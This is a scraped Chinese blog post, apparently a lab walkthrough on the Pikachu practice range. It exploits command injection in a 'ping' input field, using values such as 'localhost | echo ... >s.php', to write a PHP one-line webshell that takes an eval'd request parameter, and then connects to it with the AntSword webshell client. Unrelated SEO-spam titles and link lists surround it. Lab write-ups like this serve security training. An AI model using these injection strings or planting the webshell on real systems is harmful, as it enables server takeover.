当前位置: 首页 > news >正文

淘客怎么做推广网站深圳企业黄页网

淘客怎么做推广网站,深圳企业黄页网,网站建设开发合同模板,个人网站建设工作室目录 一、准备靶场,进入RCE 二、测试写入文件 三、使用中国蚁剑 一、准备靶场,进入RCE 我这里用的是pikachu 打开pikachu靶场,选择 RCE > exec "ping" 测试是否存在 Rce 漏洞 因为我们猜测在这个 ping 功能是直接调用系统…

目录

一、准备靶场,进入RCE

二、测试写入文件

三、使用中国蚁剑


一、准备靶场,进入RCE

我这里用的是pikachu

打开pikachu靶场,选择 RCE > exec "ping"

 测试是否存在 Rce 漏洞

因为我们猜测在这个 ping 功能是直接调用系统的 ping 命令,如:

ping (输入框的内容)

那我们就可以利用这个构造恶意指令,

当我们的输入框内填入 “localhost | ipconfig”时,执行的指令为:

ping localhost | ipconfig

可是经过测试发现并没有回显,执行后并无反应

二、测试写入文件

我们尝试写入文件:

当我们的输入框内填入 “localhost | echo 999>2.php”时,执行的指令为:

ping localhost | echo 999>2.php

点击ping,此时界面还是只刷新了一下,并没有明显反应。

我们查看一下是否写入成功,访问http://你的ip:你的端口/vul/rce/2.php

很明显写入成功,那我们尝试写入我们的一句话木马:

Windows和Linux下写入一句话PHP木马echo命令总结

当我们的输入框内填入 “localhost | echo '<?php eval($_REQUEST[74])?>' >s.php”(中括号内的74可以换成你的密码)时,执行的指令为:

ping localhost | echo '<?php eval($_REQUEST[74])?>' >s.php

访问http://你的ip:你的端口/vul/rce/s.php,发现一片空白,说明写入成功。因为如果服务器没文件应该会报“/vul/rce/s1.php was not found

三、使用中国蚁剑

打开中国蚁剑,右键添加数据:

输入一句话木马的url:

拿下:

http://www.tj-hxxt.cn/news/110447.html

相关文章:

  • 建筑装饰和网站建设哪个好网页模板素材
  • godaddy的wordpress什么是seo搜索引擎优化
  • 嘉祥做网站湖南优化电商服务有限公司
  • 平陆县网站建设国内新闻大事20条
  • 网站管理建站北京百度竞价托管
  • 解析视频的网站怎么做抖音seo优化系统招商
  • 四川建网站知名网站
  • 做空eth网站模板建站和开发网站区别
  • 网站建设教程论坛网络推广软件免费
  • 大陆怎么做香港网站抖音优化
  • 长沙营销网站建设seo优化一般包括
  • 东莞凤岗网站建设seo沈阳
  • 定制开发电商网站建设多少钱郑州seo技术外包
  • 怎么样网站速度快北京网站建设专业公司
  • 郑州外贸网站建设公司需要优化的网站有哪些?
  • 张家港杨舍网站制作个人外包接单平台
  • 个人可以做电影网站吗手机登录百度pc端入口
  • 网站建设logo曹操seo博客
  • 行业类网站模板北京网站优化排名推广
  • 做折线图网站武汉刚刚突然宣布
  • 网站开发对比特点张雪峰谈广告学专业
  • 网站规划 设计 制作 发布与管理过程学seo哪个培训好
  • 深圳有做网站的公司吗在seo优化中
  • 廉政网站建设经验交流微信app小程序开发
  • 企业网站开发汇报挖掘关键词工具
  • 教育直播网站建设seo公司关键词
  • 网站色差表搜索引擎优化原理
  • 做系统网站信息检索网站网店营销的推广方法有哪些
  • java做软件的网站外贸网站平台都有哪些
  • 备案网站内容怎么写迅速上排名网站优化